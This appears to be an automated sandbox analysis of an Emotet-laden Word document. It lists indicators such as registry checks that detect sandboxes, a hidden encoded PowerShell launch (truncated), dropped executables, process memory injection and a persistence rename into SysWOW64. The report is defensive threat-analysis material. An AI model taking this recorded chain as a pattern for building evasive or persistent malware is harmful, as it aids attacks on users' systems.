Analysis
max time kernel: 29s
resource: win10v191014
submitted: 14-01-2020 01:55

General
Malware Config
Extracted
Extracted
emotet
Signatures

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4976  WINWORD.EXE

Process spawned unexpected child process (1 IoC)
  description                                                                         pid   pid_target  Process         procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  3712  5100        powershell.exe  73

Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process            procid_target
  PID 3712 wrote to memory of 4756  3712  powershell.exe     80
  PID 4756 wrote to memory of 3864  4756  657.exe            81
  PID 4444 wrote to memory of 4080  4444  methodsdispid.exe  83

Executes dropped EXE (4 IoCs)
  pid   Process
  4756  657.exe
  3864  657.exe
  4444  methodsdispid.exe
  4080  methodsdispid.exe

Suspicious behavior: EmotetMutantsSpam (2 IoCs)
  pid   Process
  3864  657.exe
  4080  methodsdispid.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                   Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0       WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                              Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS                WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily   WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU      WINWORD.EXE

Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  4976  WINWORD.EXE
  4756  657.exe
  3864  657.exe
  4444  methodsdispid.exe
  4080  methodsdispid.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  3712  powershell.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  3712  powershell.exe

Drops file in System32 directory (1 IoC)
  description   ioc                                                              Process
  File renamed  C:\Users\Admin\657.exe => C:\Windows\SysWOW64\methodsdispid.exe  657.exe
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ca99f191c3ae6a2034d8370f23374146725012b89a87773d3675eb41a1176599.doc" /o ""
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  PID: 4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -en ...
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  PID: 3712

  C:\Users\Admin\657.exe
    "C:\Users\Admin\657.exe"
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID: 4756

    C:\Users\Admin\657.exe
      --67bc65d6
      - Executes dropped EXE
      - Suspicious behavior: EmotetMutantsSpam
      - Suspicious use of SetWindowsHookEx
      - Drops file in System32 directory
      PID: 3864

C:\Windows\SysWOW64\methodsdispid.exe
  "C:\Windows\SysWOW64\methodsdispid.exe"
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID: 4444

  C:\Windows\SysWOW64\methodsdispid.exe
    --f4d1fd05
    - Executes dropped EXE
    - Suspicious behavior: EmotetMutantsSpam
    - Suspicious use of SetWindowsHookEx
    PID: 4080